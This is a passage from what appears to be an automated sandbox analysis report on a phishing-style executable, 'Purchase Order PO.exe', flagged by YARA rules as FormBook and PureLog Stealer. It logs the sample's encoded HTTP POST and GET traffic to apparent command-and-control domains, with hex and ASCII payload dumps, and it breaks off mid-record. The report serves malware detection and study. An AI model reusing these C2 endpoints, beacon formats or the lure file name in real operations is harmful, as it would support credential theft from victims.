                                                            Host: www.bser101pp.buzz
                                                            Accept: */*
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-us
                                                            Origin: http://www.bser101pp.buzz
                                                            Content-Length: 225
                                                            Connection: close
                                                            Cache-Control: no-cache
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Referer: http://www.bser101pp.buzz/v89f/
                                                            User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                            Data Raw: 61 58 38 70 3d 69 54 66 45 56 2f 47 69 30 4a 6e 51 57 35 73 52 35 32 6a 38 6c 58 31 6a 66 6a 61 6a 4f 54 6b 6c 38 53 44 68 59 46 63 78 2b 75 4c 51 30 68 41 37 69 35 78 48 32 44 65 7a 34 4c 44 57 77 41 30 39 71 52 30 53 54 7a 52 4e 6d 57 41 73 57 35 59 55 77 43 4e 48 32 49 6f 37 74 42 33 41 4f 6e 54 75 55 58 36 67 47 35 4c 75 39 75 4b 59 48 44 64 45 71 67 43 63 63 59 6f 63 65 71 69 5a 33 71 6e 33 6f 44 2f 49 43 72 76 67 50 35 6f 37 62 41 31 64 75 51 56 4c 66 4f 64 63 50 78 55 6c 2b 6c 47 53 32 46 4d 41 68 4f 44 77 67 33 6d 4f 63 64 66 54 48 67 6a 44 61 36 51 4c 45 2b 54 32 59 42 49 55 6b 63 4c 6d 68 32 69 77 45 61 41 75 79 46 43 2b 4f 78 44 7a 50 67 2b 46 44 34 68 33
                                                            Data Ascii: aX8p=iTfEV/Gi0JnQW5sR52j8lX1jfjajOTkl8SDhYFcx+uLQ0hA7i5xH2Dez4LDWwA09qR0STzRNmWAsW5YUwCNH2Io7tB3AOnTuUX6gG5Lu9uKYHDdEqgCccYoceqiZ3qn3oD/ICrvgP5o7bA1duQVLfOdcPxUl+lGS2FMAhODwg3mOcdfTHgjDa6QLE+T2YBIUkcLmh2iwEaAuyFC+OxDzPg+FD4h3
                                                            Nov 27, 2024 15:33:43.016271114 CET974INHTTP/1.1 404 Not Found
                                                            Date: Wed, 27 Nov 2024 14:33:42 GMT
                                                            Content-Type: text/html
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ERCbM3avfPexHHhqjbVzPnZzos0Plqnhr9ABY72UY2o8zS5EjrpOhBRrT%2Fnp6hitSGN1gvSzzySQwP6e%2F8Yl17SplZ882aidqPE1cXySKfa5%2FpRkaWCgFzgXL5ji1acMa6k1Vc8%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8e92d5ba2e928c89-EWR
                                                            Content-Encoding: gzip
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1792&min_rtt=1792&rtt_var=896&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=651&delivery_rate=0&cwnd=200&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            11192.168.2.549912172.67.158.106801732C:\Program Files (x86)\vAAKVpQpArbbmISWHRkaFhhaEkwwLggmWAaspuRaPpSwMdjVQyY\GDDZlGeaCapsK.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 27, 2024 15:33:44.494863987 CET1668OUTPOST /v89f/ HTTP/1.1
                                                            Host: www.bser101pp.buzz
                                                            Accept: */*
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-us
                                                            Origin: http://www.bser101pp.buzz
                                                            Content-Length: 1241
                                                            Connection: close
                                                            Cache-Control: no-cache
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Referer: http://www.bser101pp.buzz/v89f/
                                                            User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                            Data Raw: 61 58 38 70 3d 69 54 66 45 56 2f 47 69 30 4a 6e 51 57 35 73 52 35 32 6a 38 6c 58 31 6a 66 6a 61 6a 4f 54 6b 6c 38 53 44 68 59 46 63 78 2b 75 54 51 30 54 49 37 34 61 5a 48 33 44 65 7a 31 72 44 56 77 41 30 67 71 56 59 73 54 7a 56 64 6d 55 34 73 58 63 4d 55 67 67 31 48 34 49 6f 37 77 78 33 42 54 33 53 73 55 58 71 73 47 35 62 75 39 75 4b 59 48 46 78 45 70 31 2b 63 62 6f 6f 66 5a 71 69 64 67 36 6e 54 6f 44 57 7a 43 71 62 65 50 4a 49 37 61 67 6c 64 31 46 68 4c 44 65 64 53 4b 78 56 69 2b 6c 61 4e 32 46 51 4d 68 4f 47 66 67 77 71 4f 66 59 69 57 43 55 37 49 62 36 42 6d 4f 4d 4c 34 4a 47 45 31 6c 2f 72 70 68 56 4b 6a 49 4b 6f 6e 2f 44 7a 38 50 51 72 33 62 6b 36 6b 53 75 41 6e 66 42 69 72 2f 69 58 76 46 4b 47 31 34 5a 75 51 69 38 50 4c 50 61 53 79 32 75 79 6e 48 61 71 55 70 32 45 41 38 64 75 43 30 68 41 39 61 64 6e 62 46 4c 42 66 65 51 67 6e 62 52 51 6c 36 62 46 41 58 73 78 39 71 49 75 4c 35 33 53 4f 6a 47 47 67 4a 68 76 68 74 37 4a 36 37 68 4d 44 43 50 33 65 4c 4d 35 46 43 46 51 6f 6d 59 47 45 32 64 76 61 47 [TRUNCATED]
                                                            Data Ascii: aX8p=iTfEV/Gi0JnQW5sR52j8lX1jfjajOTkl8SDhYFcx+uTQ0TI74aZH3Dez1rDVwA0gqVYsTzVdmU4sXcMUgg1H4Io7wx3BT3SsUXqsG5bu9uKYHFxEp1+cboofZqidg6nToDWzCqbePJI7agld1FhLDedSKxVi+laN2FQMhOGfgwqOfYiWCU7Ib6BmOML4JGE1l/rphVKjIKon/Dz8PQr3bk6kSuAnfBir/iXvFKG14ZuQi8PLPaSy2uynHaqUp2EA8duC0hA9adnbFLBfeQgnbRQl6bFAXsx9qIuL53SOjGGgJhvht7J67hMDCP3eLM5FCFQomYGE2dvaG5mRYsHBQihFb3p3W2jezpBR7aCqqew2WkkXtoiholR9tSi0j+3J+rH6Qlan1F8lXD5OkDFfl+Tm0iZO7HgRLTJIW4KWUNgEuG/jfI1rsbQfZSsXfoq7rGm9R8MIbkcoFtej2DenAJoMnm4JyzAoRB8o6/g/Ljy9C9pFiihTU2z7O8g0LVWY5vPNRO/eVbylU32ZbRPPOYuGZiHT+XHsv28zuLs5e0NI5+BHHreTUX3MLebOOgYKl7oU0/d0YjC3N4ODtdwwjkKZlDhZt0aLAa3zHZZjimC8ICrdGiDY1K9KHu4LwVNg3Wrl+2azqedVedzEu57q0fvQKFAN3Lm5lJBKi7SxWMGz/54n3Drl+jX9syWMtqy+QbFBC24r3BpEev1mDiZ8i7UObbCYLy0aRY23UJ2ZZyFbDf94OSh67DO/dwJeNVktIDQKdT+wc0aaCcfMM6TKUUmf5xgpQ50idLvClrhb+FyQEsldSlEATzLjJ+6fqWRC+kTFBT+qnEkxMWTAWNCcnBtFHfV3ThBromCxc3SfE7YdUFTi6sIvVTrwNd53m5TLdS4wEx4hWMoEMXExyZjGF4TfejfqV2kwr7yCleHltvxz5uF3caBRV7YfOQEqhLTS2A8pZnGmnKqfP4Dn7CPNjWGi6TQhcStZpgdprpw+wyU2GQl [TRUNCATED]
                                                            Nov 27, 2024 15:33:45.722532034 CET974INHTTP/1.1 404 Not Found
                                                            Date: Wed, 27 Nov 2024 14:33:45 GMT
                                                            Content-Type: text/html
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wHyH0WLGHpHX27VJmGFXFTEf9VfndHih1prS2yDx8aNSMvbiRzyQqfc6ue44LZZILAShNfD2W3RCiYDMykU44rvYGa4B8%2F%2BqsXQxTPz31vxErFColDdJz19Cz8OiWrS1iOzAjic%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8e92d5caee2f7ca8-EWR
                                                            Content-Encoding: gzip
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2093&min_rtt=2093&rtt_var=1046&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1668&delivery_rate=0&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            12192.168.2.549920172.67.158.106801732C:\Program Files (x86)\vAAKVpQpArbbmISWHRkaFhhaEkwwLggmWAaspuRaPpSwMdjVQyY\GDDZlGeaCapsK.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 27, 2024 15:33:47.159660101 CET368OUTGET /v89f/?aX8p=vR3kWP+v98PFeIQX6HbJh3lQDWTjSRYryWjHUGMo4+T5xi8TnNV+jgD2+4ag3QdSrCwOZVBfu0hve5I79B9kwJAbzgbWQC+UfE7zMLLi7rmhPg9Rv0rLNpU4Xsyq1J6Z3g==&VF=6pChKdZP- HTTP/1.1
                                                            Host: www.bser101pp.buzz
                                                            Accept: */*
                                                            Accept-Language: en-us
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                            Nov 27, 2024 15:33:48.415388107 CET1236INHTTP/1.1 404 Not Found
                                                            Date: Wed, 27 Nov 2024 14:33:48 GMT
                                                            Content-Type: text/html
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2Xltn0lpvpCSiCXJtnYaeYB8h1atQr85Pbq5LAWWbZODZg2en2m%2BnpcL4x4tpWrpHDczoGEEmwPZrD3Ob4DQEKRzdVUi3kInBiJi6I9y5YcJjjKaZKS6gZgsjHRmR8rJcTE2%2Bx0%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8e92d5dbe8418c95-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1799&min_rtt=1799&rtt_var=899&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=368&delivery_rate=0&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 [TRUNCATED]
                                                            Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome frien
                                                            Nov 27, 2024 15:33:48.415673971 CET94INData Raw: 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20
                                                            Data Ascii: dly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            13192.168.2.5499353.33.130.190801732C:\Program Files (x86)\vAAKVpQpArbbmISWHRkaFhhaEkwwLggmWAaspuRaPpSwMdjVQyY\GDDZlGeaCapsK.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 27, 2024 15:33:54.314254999 CET652OUTPOST /8m07/ HTTP/1.1
                                                            Host: www.goldstarfootwear.shop
                                                            Accept: */*
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-us
                                                            Origin: http://www.goldstarfootwear.shop
                                                            Content-Length: 205
                                                            Connection: close
                                                            Cache-Control: no-cache
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Referer: http://www.goldstarfootwear.shop/8m07/
                                                            User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                            Data Raw: 61 58 38 70 3d 37 66 76 6f 72 36 61 2b 78 64 2b 35 70 6a 46 4e 78 44 50 73 76 71 2f 54 74 6e 2f 76 71 58 52 64 72 6b 33 52 50 4b 4e 49 58 73 6c 44 6f 70 6c 67 5a 73 36 55 59 44 35 6a 6c 31 5a 31 51 50 63 2b 7a 77 5a 4d 38 37 34 41 52 77 76 77 74 4d 4d 48 54 72 2f 61 51 49 50 6d 38 62 56 6c 5a 31 31 4e 45 2b 33 4d 43 33 51 4d 7a 44 66 6b 45 5a 65 57 44 77 75 36 62 54 36 4c 35 49 30 4e 36 6a 6c 66 68 55 68 6f 62 43 74 32 78 67 32 67 4f 79 58 6c 56 74 47 6f 62 52 48 4d 30 4f 4c 79 6c 51 41 2f 69 4e 78 43 4f 4c 6e 57 53 75 79 34 45 58 71 4c 7a 35 51 32 4a 44 65 64 67 5a 48 69 31 51 51 51 61 35 6b 4c 4c 6c 55 3d
                                                            Data Ascii: aX8p=7fvor6a+xd+5pjFNxDPsvq/Ttn/vqXRdrk3RPKNIXslDoplgZs6UYD5jl1Z1QPc+zwZM874ARwvwtMMHTr/aQIPm8bVlZ11NE+3MC3QMzDfkEZeWDwu6bT6L5I0N6jlfhUhobCt2xg2gOyXlVtGobRHM0OLylQA/iNxCOLnWSuy4EXqLz5Q2JDedgZHi1QQQa5kLLlU=


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            14192.168.2.5499423.33.130.190801732C:\Program Files (x86)\vAAKVpQpArbbmISWHRkaFhhaEkwwLggmWAaspuRaPpSwMdjVQyY\GDDZlGeaCapsK.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 27, 2024 15:33:57.092953920 CET672OUTPOST /8m07/ HTTP/1.1
                                                            Host: www.goldstarfootwear.shop
                                                            Accept: */*
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-us
                                                            Origin: http://www.goldstarfootwear.shop
                                                            Content-Length: 225
                                                            Connection: close
                                                            Cache-Control: no-cache
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Referer: http://www.goldstarfootwear.shop/8m07/
                                                            User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                            Data Raw: 61 58 38 70 3d 37 66 76 6f 72 36 61 2b 78 64 2b 35 76 44 56 4e 7a 6b 37 73 37 36 2f 63 78 58 2f 76 6a 33 52 42 72 6b 37 52 50 4f 55 54 58 65 52 44 6f 49 56 67 66 64 36 55 49 54 35 6a 74 56 5a 77 55 50 63 44 7a 77 64 79 38 36 45 41 52 77 72 77 74 4e 38 48 54 34 48 56 51 59 50 6b 30 37 56 6e 57 56 31 4e 45 2b 33 4d 43 33 46 70 7a 44 48 6b 45 70 75 57 43 56 4f 35 57 7a 36 4b 6f 49 30 4e 70 7a 6c 54 68 55 67 4e 62 44 77 6a 78 6d 36 67 4f 7a 6e 6c 4d 63 47 72 56 68 48 43 33 2b 4b 64 75 46 68 6f 6b 50 45 58 55 6f 71 72 42 34 47 61 49 42 62 68 70 62 59 65 61 6a 79 6c 77 4b 50 56 6b 67 78 35 41 61 30 37 56 79 42 71 54 30 76 6b 4e 30 42 4d 59 43 51 6c 39 7a 69 57 6a 59 37 53
                                                            Data Ascii: aX8p=7fvor6a+xd+5vDVNzk7s76/cxX/vj3RBrk7RPOUTXeRDoIVgfd6UIT5jtVZwUPcDzwdy86EARwrwtN8HT4HVQYPk07VnWV1NE+3MC3FpzDHkEpuWCVO5Wz6KoI0NpzlThUgNbDwjxm6gOznlMcGrVhHC3+KduFhokPEXUoqrB4GaIBbhpbYeajylwKPVkgx5Aa07VyBqT0vkN0BMYCQl9ziWjY7S


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            15192.168.2.5499493.33.130.190801732C:\Program Files (x86)\vAAKVpQpArbbmISWHRkaFhhaEkwwLggmWAaspuRaPpSwMdjVQyY\GDDZlGeaCapsK.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 27, 2024 15:33:59.793991089 CET1689OUTPOST /8m07/ HTTP/1.1
                                                            Host: www.goldstarfootwear.shop
                                                            Accept: */*
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-us
                                                            Origin: http://www.goldstarfootwear.shop
                                                            Content-Length: 1241
                                                            Connection: close
                                                            Cache-Control: no-cache
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Referer: http://www.goldstarfootwear.shop/8m07/
                                                            User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                            Data Raw: 61 58 38 70 3d 37 66 76 6f 72 36 61 2b 78 64 2b 35 76 44 56 4e 7a 6b 37 73 37 36 2f 63 78 58 2f 76 6a 33 52 42 72 6b 37 52 50 4f 55 54 58 65 4a 44 6f 61 4e 67 63 2b 53 55 61 44 35 6a 6a 31 5a 78 55 50 63 53 7a 77 6c 32 38 36 49 71 52 79 44 77 74 76 45 48 47 35 48 56 65 59 50 6b 34 62 56 6d 5a 31 31 59 45 39 4f 46 43 33 56 70 7a 44 48 6b 45 71 32 57 4c 67 75 35 46 6a 36 4c 35 49 30 6f 36 6a 6b 47 68 51 4e 77 62 44 6c 59 78 57 61 67 4f 51 66 6c 4f 4f 65 72 54 78 48 41 2b 75 4b 46 75 46 6b 76 6b 4c 6c 35 55 70 75 56 42 2f 79 61 4b 67 32 68 72 6f 73 44 46 69 36 63 67 4c 48 74 35 47 59 65 4b 35 63 59 57 7a 78 53 5a 77 6a 39 41 67 38 49 64 79 46 2b 6f 79 71 79 7a 2f 44 62 58 44 70 74 72 36 74 46 31 54 70 50 37 57 37 6f 75 78 63 58 79 5a 6e 4e 63 4e 51 41 6b 2b 52 35 67 69 45 77 54 4b 69 4b 57 43 45 37 56 57 6c 68 52 79 47 4d 75 56 6b 54 67 64 30 53 47 30 33 2b 57 4a 35 69 6c 72 68 76 48 42 4b 6b 33 78 32 4d 7a 68 61 48 63 79 67 50 57 69 4f 44 4c 55 59 72 42 43 44 34 78 52 79 44 75 76 62 48 30 76 42 33 67 [TRUNCATED]
                                                            Data Ascii: aX8p=7fvor6a+xd+5vDVNzk7s76/cxX/vj3RBrk7RPOUTXeJDoaNgc+SUaD5jj1ZxUPcSzwl286IqRyDwtvEHG5HVeYPk4bVmZ11YE9OFC3VpzDHkEq2WLgu5Fj6L5I0o6jkGhQNwbDlYxWagOQflOOerTxHA+uKFuFkvkLl5UpuVB/yaKg2hrosDFi6cgLHt5GYeK5cYWzxSZwj9Ag8IdyF+oyqyz/DbXDptr6tF1TpP7W7ouxcXyZnNcNQAk+R5giEwTKiKWCE7VWlhRyGMuVkTgd0SG03+WJ5ilrhvHBKk3x2MzhaHcygPWiODLUYrBCD4xRyDuvbH0vB3gFPmzp6BvBKNq2htH0szSm9kR6nDs5yuIrrMbb+RYd7wvrktRVZGD2ELuf6VcmAyw4KH3UvrsytB33zZhTfzn2rRZLi8L7GQtl44Fb45xIFR1QDaZmkMNDED+V58DFGHAOhU1AzM6iFAdDBn+5k/WcJF4LKWN2BQONO4W1/KGxEKFe4joZXRUlj63NtBpUbjIZHpckNmfoVGEzRmwuwickskhWcJVsNl+8TWvu8Ov7lgh8p5qBOyZs+oN2xfLr283x9D8SzNA69cWzxroE4++PflYUaQKZzWrHF5+HFg6ciEDrvPnb04mY7wjZAjYAzZ+bSKohMqCvUupjqGoMfO59CSGMpBEyCk3hly7x/7cpdYFTFouz+AdB03Iqp/8IGx41JZnnztBEf5dGbp78u3o3Es8x7EhVFEs4O9W23OvynobN7TUzWznsr5sDnpcHWEUJqWnz7bSfecFvRoQ3MtF1+kG57ZmtWBKnPdECHIcDT6ZvRDUefjWaDJfLcrepvaIaqzLJ94mHslXdeyV5xzqwNpdW1QRRI+eqRXu4oSLR3b6/kxC2UsD3x3s5I7TPhb4tYfxe4I+OamZ66/rm6XQjTseQm165Xt9iQLVyaG7j0Hv0cZ7kKfeZd4bDpvVIpWseJk6OmqSUH78gHEM6j6KyDbtWeZaYmKuc+ [TRUNCATED]


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            16192.168.2.5499573.33.130.19080
                                                            TimestampBytes transferredDirectionData
                                                            Nov 27, 2024 15:34:02.912448883 CET375OUTGET /8m07/?aX8p=2dHIoPS/8uSmn0UQwBXvkZ7FsiKx9Udv3lXpG+Z7ZfR3/r1MA6yfaSEuuX1gcPtu0HplxKUHBw+SrOQKMJrrWbrjk6J8ayNTDMCMOGYuxRKnH7u2JQatSR3r/5wv+jpa8Q==&VF=6pChKdZP- HTTP/1.1
                                                            Host: www.goldstarfootwear.shop
                                                            Accept: */*
                                                            Accept-Language: en-us
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                            Nov 27, 2024 15:34:04.046238899 CET405INHTTP/1.1 200 OK
                                                            Server: openresty
                                                            Date: Wed, 27 Nov 2024 14:34:03 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 265
                                                            Connection: close
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 61 58 38 70 3d 32 64 48 49 6f 50 53 2f 38 75 53 6d 6e 30 55 51 77 42 58 76 6b 5a 37 46 73 69 4b 78 39 55 64 76 33 6c 58 70 47 2b 5a 37 5a 66 52 33 2f 72 31 4d 41 36 79 66 61 53 45 75 75 58 31 67 63 50 74 75 30 48 70 6c 78 4b 55 48 42 77 2b 53 72 4f 51 4b 4d 4a 72 72 57 62 72 6a 6b 36 4a 38 61 79 4e 54 44 4d 43 4d 4f 47 59 75 78 52 4b 6e 48 37 75 32 4a 51 61 74 53 52 33 72 2f 35 77 76 2b 6a 70 61 38 51 3d 3d 26 56 46 3d 36 70 43 68 4b 64 5a 50 2d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?aX8p=2dHIoPS/8uSmn0UQwBXvkZ7FsiKx9Udv3lXpG+Z7ZfR3/r1MA6yfaSEuuX1gcPtu0HplxKUHBw+SrOQKMJrrWbrjk6J8ayNTDMCMOGYuxRKnH7u2JQatSR3r/5wv+jpa8Q==&VF=6pChKdZP-"}</script></head></html>


                                                            Statistics

                                                            CPU Usage

                                                            Click to jump to process

                                                            Memory Usage

                                                            Click to jump to process

                                                            High Level Behavior Distribution

                                                            Click to dive into process behavior distribution

                                                            Behavior

                                                            Click to jump to process

                                                            System Behavior

                                                            General

                                                            Target ID:0
                                                            Start time:09:31:56
                                                            Start date:27/11/2024
                                                            Path:C:\Users\user\Desktop\Purchase Order PO.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\Purchase Order PO.exe"
                                                            Imagebase:0xa80000
                                                            File size:927'744 bytes
                                                            MD5 hash:0CC96CC7CA98F253A1DAEABF90A7692D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2072668153.0000000005A60000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2070921717.0000000003F99000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2070921717.0000000004053000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:low
                                                            Has exited:true

                                                            General

                                                            Target ID:3
                                                            Start time:09:31:59
                                                            Start date:27/11/2024
                                                            Path:C:\Users\user\Desktop\Purchase Order PO.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\Purchase Order PO.exe"
                                                            Imagebase:0x4d0000
                                                            File size:927'744 bytes
                                                            MD5 hash:0CC96CC7CA98F253A1DAEABF90A7692D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2437240336.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2438402201.0000000000ED0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2439723626.00000000013A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                            Reputation:low
                                                            Has exited:true

                                                            General

                                                            Target ID:5
                                                            Start time:09:32:28
                                                            Start date:27/11/2024
